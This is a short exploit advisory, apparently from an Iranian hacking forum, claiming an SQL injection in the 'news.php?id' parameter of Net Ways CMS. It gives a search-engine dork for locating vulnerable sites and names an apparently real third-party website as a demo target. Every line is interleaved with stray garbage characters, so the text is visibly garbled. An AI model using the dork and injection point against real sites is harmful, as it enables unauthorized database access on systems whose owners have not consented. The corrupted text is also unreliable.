################################################################################??########
2 m8 K0 Y6 v# G' m' x" w- B1 B. L#
! @9 S* k0 m2 I# Exploit Title : Net Ways Cms Sql Injection Vulnerability
( N+ F4 j3 n4 e) q#
- e! X7 o2 c: x& E" c) x# Author : IrIsT.Ir
2 E$ P: X2 Q6 X+ k#
& b3 {3 }& z" o5 a6 F1 q9 }# Discovered By : Am!r
" t/ E1 M; {3 w% F; o7 ]# 3 O( Z0 S2 ]+ m
# Home : http://IrIsT.Ir/forum 3 E& i5 w& `/ H k, Z
#
1 v0 M2 S% w# T( n1 R, D# Software Link : http://www.netways.com/ www.political-security.com+ S8 u2 e8 R# |1 S3 o# y: ]
#
; R% ]: u' B9 e& M4 X! B# Security Risk : High ( z# p* {6 Y, M: u: }) p
# - W4 S# W$ H3 m* y* v- A) G4 G
# Version : All Version $ n' Q6 g" l, B, H0 d% n: @
# " L6 O9 E A3 c/ e0 U1 A9 \* M
# Tested on : GNU/Linux Ubuntu - Windows Server - win7
: E; n N) `8 p# {9 P$ X4 _/ g#
! R3 P9 G2 O# ^# Dork : intext:"Designed & developed by NetWays" + c9 k N7 F' ~$ g1 ^
#
+ ]% `/ I6 e9 C' {0 z0 w$ U4 X% E################################################################################??######## 8 @0 y+ Z3 t' @9 D
# ; _) b3 [' S' e+ i, @2 W' N
# Expl0iTs :
+ t1 T' ?- z# F# 6 j+ H U7 j) D, U4 U' V" U8 o/ ~
# http://target.com/news.php?id=[Sql]
8 d2 O ?$ G% g3 R9 ^, F# ' o: p* h* @. l
#
. P( |0 h) m7 T$ J# D3mo :
, L a1 u9 F% l# , Y H" U Y, c6 b5 Z% G
# http://compagnieparento.com/news.php?id=7[Sql] $ ?4 w, ~2 _3 ]% o4 }
#
7 h8 H2 p, q* T& p5 r################################################################################??######## % F4 V3 b9 v' m0 g6 H4 `+ s
#
) n5 i* v' c! B* \6 Z# Greats : B3HZ4D - nimaarek - Dead.Zone - C0dex - SpooferNinja - TaK.FaNaR - Nafsh - BestC0d3r
3 @; V. R7 @( g2 z3 K* B2 H8 k#
- _2 v# x0 q2 y# 0x0ptim0us - TaK.FaNaR - m3hdi - F@rid - Siamak.Black - H4x0r - dr.tofan - skote_vahshat - d3c0d3r
! F F+ U' u% r. c9 c; b#
8 r/ N) M( Z$ X6 h# Mr.Xpr & M.R.S.CO & Mr.Cicili & H-SK33PY & All Members In Www.IrIsT.Ir/forum 7 M; v9 y8 U" G8 w
# 5 N3 K( A& t* e4 S2 d! ^. Z2 [# m
################################################################################??######## |